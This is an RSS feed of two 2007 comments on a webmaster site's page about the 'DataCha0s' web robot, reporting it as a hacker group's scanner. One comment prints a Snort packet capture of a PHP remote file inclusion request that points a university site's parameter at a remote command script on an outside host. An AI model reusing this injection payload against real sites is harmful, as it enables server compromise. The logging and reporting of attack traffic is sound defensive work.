<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: DataCha0s</title>
	<atom:link href="http://www.internetofficer.com/web-robot/datacha0s/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.internetofficer.com/web-robot/datacha0s/</link>
	<description>Tools and Articles for Webmasters and SEO's</description>
	<lastBuildDate>Thu, 22 Jul 2010 17:36:36 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
	<item>
		<title>By: Reg Quinton</title>
		<link>http://www.internetofficer.com/web-robot/datacha0s/comment-page-1/#comment-1064</link>
		<dc:creator>Reg Quinton</dc:creator>
		<pubDate>Wed, 25 Jul 2007 15:39:38 +0000</pubDate>
		<guid isPermaLink="false">http://www.internetofficer.com/web-robot/datacha0s/#comment-1064</guid>
		<description>DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here:

&lt;em&gt;http:/&lt;/em&gt;&lt;em&gt;/ww&lt;/em&gt;&lt;em&gt;w.invasao.com.br/grupo04.htm&lt;/em&gt;

I&#039;m seeing lots of different attacks. I assume some common code they&#039;re sharing.</description>
		<content:encoded><![CDATA[<p>DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here:</p>
<p><em>http:/</em><em>/ww</em><em>w.invasao.com.br/grupo04.htm</em></p>
<p>I&#8217;m seeing lots of different attacks. I assume some common code they&#8217;re sharing.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Reg Quinton</title>
		<link>http://www.internetofficer.com/web-robot/datacha0s/comment-page-1/#comment-1060</link>
		<dc:creator>Reg Quinton</dc:creator>
		<pubDate>Thu, 19 Jul 2007 13:52:46 +0000</pubDate>
		<guid isPermaLink="false">http://www.internetofficer.com/web-robot/datacha0s/#comment-1060</guid>
		<description>This robot seems to be doing PHP injection attacks as well. Snort packet capture:

&lt;code&gt;07/19-02:12:29.380290 200.215.129.70:44232 -&gt; 129.97.128.84:80
TCP TTL:47 TOS:0x0 ID:12084 IpLen:20 DgmLen:239 DF
***AP*** Seq: 0xF2D04426  Ack: 0x225106  Win: 0x16D0  TcpLen: 32
TCP Options (3) =&gt; NOP NOP TS: 1411345356 2713027245 
47 45 54 20 2F 68 69 73 74 6F 72 79 2F 63 6F 6D  GET /history/com
70 6C 65 74 65 73 65 61 73 6F 6E 64 65 74 61 69  pleteseasondetai
6C 73 2E 70 68 70 3F 53 65 61 73 6F 6E 3D 68 74  ls.php?Season=ht
74 70 3A 2F 2F 77 77 77 2E 75 6E 6C 6F 63 6B 70  tp://www.unlockp
6C 61 7A 61 2E 6E 6C 2F 6D 65 64 69 61 2F 63 6D  laza.nl/media/cm
64 3F 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E  d? HTTP/1.0..Con
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
55 73 65 72 2D 41 67 65 6E 74 3A 20 44 61 74 61  User-Agent: Data
43 68 61 30 73 2F 32 2E 30 0D 0A 48 6F 73 74 3A  Cha0s/2.0..Host:
20 77 77 77 2E 77 61 72 72 69 6F 72 6D 65 6E 73   www.warriormens
62 61 73 6B 65 74 62 61 6C 6C 2E 75 77 61 74 65  basketball.uwate
72 6C 6F 6F 2E 63 61 0D 0A 0D 0A                 rloo.ca....&lt;/code&gt;

The content they&#039;re trying to eject is clearly malicious:

&lt;code&gt;Angels of Death &gt; #AoD &gt; irc.gigachat.net &gt; CMD &gt; File List&lt;/code&gt;</description>
		<content:encoded><![CDATA[<p>This robot seems to be doing PHP injection attacks as well. Snort packet capture:</p>
<p><code>07/19-02:12:29.380290 200.215.129.70:44232 -&gt; 129.97.128.84:80<br />
TCP TTL:47 TOS:0x0 ID:12084 IpLen:20 DgmLen:239 DF<br />
***AP*** Seq: 0xF2D04426  Ack: 0x225106  Win: 0x16D0  TcpLen: 32<br />
TCP Options (3) =&gt; NOP NOP TS: 1411345356 2713027245<br />
47 45 54 20 2F 68 69 73 74 6F 72 79 2F 63 6F 6D  GET /history/com<br />
70 6C 65 74 65 73 65 61 73 6F 6E 64 65 74 61 69  pleteseasondetai<br />
6C 73 2E 70 68 70 3F 53 65 61 73 6F 6E 3D 68 74  ls.php?Season=ht<br />
74 70 3A 2F 2F 77 77 77 2E 75 6E 6C 6F 63 6B 70  tp://www.unlockp<br />
6C 61 7A 61 2E 6E 6C 2F 6D 65 64 69 61 2F 63 6D  laza.nl/media/cm<br />
64 3F 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E  d? HTTP/1.0..Con<br />
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..<br />
55 73 65 72 2D 41 67 65 6E 74 3A 20 44 61 74 61  User-Agent: Data<br />
43 68 61 30 73 2F 32 2E 30 0D 0A 48 6F 73 74 3A  Cha0s/2.0..Host:<br />
20 77 77 77 2E 77 61 72 72 69 6F 72 6D 65 6E 73   <a href="http://www.warriormens" rel="nofollow"></a><a href='http://www.warriormens'>http://www.warriormens</a><br />
62 61 73 6B 65 74 62 61 6C 6C 2E 75 77 61 74 65  basketball.uwate<br />
72 6C 6F 6F 2E 63 61 0D 0A 0D 0A                 rloo.ca....</code></p>
<p>The content they&#8217;re trying to eject is clearly malicious:</p>
<p><code>Angels of Death &gt; #AoD &gt; irc.gigachat.net &gt; CMD &gt; File List</code></p>
]]></content:encoded>
	</item>
</channel>
</rss>

